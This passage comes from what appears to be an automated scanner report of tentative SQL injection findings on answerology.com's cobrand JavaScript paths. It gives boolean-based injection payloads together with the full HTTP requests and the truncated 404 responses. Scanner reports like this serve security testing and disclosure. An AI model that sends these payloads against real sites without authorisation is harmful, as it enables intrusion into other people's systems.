<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/marieclaire/MarieClaireLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/marieclaire'%20and%201%3d1--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/marieclaire'%20and%201%3d2--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.28. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/quickandsimple/QuickAndSimpleLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10784842'%20or%201%3d1--%20 and 10784842'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/quickandsimple10784842'%20or%201%3d1--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:16 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/quickandsimple10784842'%20or%201%3d2--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:17 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/redbookmag/RedbookmagLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/redbookmag'%20and%201%3d1--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:48 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag'%20and%201%3d2--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/redbookmag/RedbookmagLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
